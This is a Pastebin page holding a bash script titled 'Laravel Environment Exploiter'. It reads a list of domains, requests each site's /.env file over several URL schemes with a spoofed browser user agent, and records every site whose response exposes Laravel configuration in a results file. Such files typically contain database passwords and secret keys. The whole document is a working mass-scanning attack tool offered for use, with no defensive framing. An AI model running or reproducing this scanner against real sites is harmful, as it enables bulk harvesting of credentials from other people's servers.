Advertisement
zerobyte-id

Exploiter Laravel .env v.1

Feb 17th, 2018
1,677
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Auto Exploit Laravel .env
  3. # Coded by ZeroByte.id
  4. # https://zerobyte.id/ - https://blog.zerobyte.id/
  5.  
  6. function exploitwww() {
  7.     target=$s;
  8.     wtp="https://www.$target";
  9.     #echo $wtp
  10.     w=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $wtp'/.env');
  11.     if [[ $w =~ 'APP_ENV' ]]; then
  12.         echo "[OK] $target/.env";
  13.         echo "$target/.env" >> result.txt
  14.     else
  15.         echo "[BAD] $target";
  16.     fi
  17. }
  18. function exploit() {
  19.     target=$s;
  20.     htp="http://$target"
  21.     e=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $htp'/.env');
  22.     if [[ $e =~ 'APP_ENV' ]]; then
  23.         echo "[OK] $target/.env";
  24.         echo "$target/.env" >> result.txt
  25.     else
  26.         echo "[BAD] $target";
  27.     fi
  28. }
  29. function exploithttps() {
  30.     target=$s;
  31.     hts="https://$target"
  32.     a=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $hts'/.env');
  33.     if [[ $a =~ 'APP_ENV' ]]; then
  34.         echo "[OK] $target/.env";
  35.         echo "$target/.env" >> result.txt
  36.     elif [[ $a =~ 'Moved Permanently' ]]; then
  37.         exploitwww $target
  38.     else
  39.         echo "[BAD] $target";
  40.     fi
  41. }
  42. cat << "banner"
  43.  _____              _           _         _     _
  44. |__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  45.   / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  46.  / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  47. /____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  48.                           |___/                  
  49. -------------------------------------------------
  50. -------- Laravel Environment Exploiter ----------
  51. -------------------------------------------------
  52. Usage : ./laravel.sh list.txt
  53.  
  54. banner
  55. for s in $(cat $1); do
  56.     target=$s;
  57.     g=$(curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" -w %{http_code} $target -o /dev/null);
  58.     if [[ $g =~ '200' ]]; then
  59.         exploit $s
  60.     elif [[ $g =~ '301' ]]; then
  61.         exploithttps $s
  62.     else
  63.         echo "[UNKNOWN] => $target"
  64.     fi
  65. done
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement